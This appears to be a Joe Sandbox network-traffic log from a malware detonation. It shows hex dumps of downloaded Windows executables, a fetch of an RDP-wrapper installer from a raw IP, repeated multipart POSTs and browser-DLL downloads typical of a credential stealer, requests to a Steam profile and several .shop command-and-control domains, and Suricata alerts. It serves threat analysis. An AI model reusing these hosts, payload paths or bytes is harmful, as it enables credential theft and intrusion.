13 a4 60 35 1d cc f3 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:08 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:10 GMTContent-Type: application/octet-streamContent-Length: 73216Last-Modified: Thu, 26 Sep 2024 22:01:15 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5d9ab-11e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 74 fc 00 00 44 25 00 00 03 00 02 00 06 00 00 06 80 2c 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 22 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 fe 01 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 a6 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 0c 03 00 70 28 02 00 00 06 02 72 26 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 a6 03 00 70 28 02 00 00 06 28 11 00 00 06 72 d8 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 0a 04 00 70 28 02 00 00 06 2a 72 d8 03 00 70 28 02 00 00 06 2a aa 72 4d 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 4d 06 00 70 28 02 00 00 06 28 52 00 00 0a 6f 53 00 00 0a 28 54 00 00 0a 2a 62 02 3a 0b 00 00 00 72 00 07 00 70 28 02 00 00 06 2a 02 6f 55 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:13 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View

IP Address: 147.45.44.104 147.45.44.104

Source: Joe Sandbox View	ASN Name: AS-PUBMATICUS AS-PUBMATICUS
Source: Joe Sandbox View	ASN Name: LIFELINK-ASRU LIFELINK-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\ProgramData\AFHDGDGIID.exe	DNS query: name: api.ipify.org
Source: C:\ProgramData\AFHDGDGIID.exe	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49764 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49769 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49789 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49788 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49787 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49791 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 104.26.13.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49792 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49794 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49795 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 7181Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 98737Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
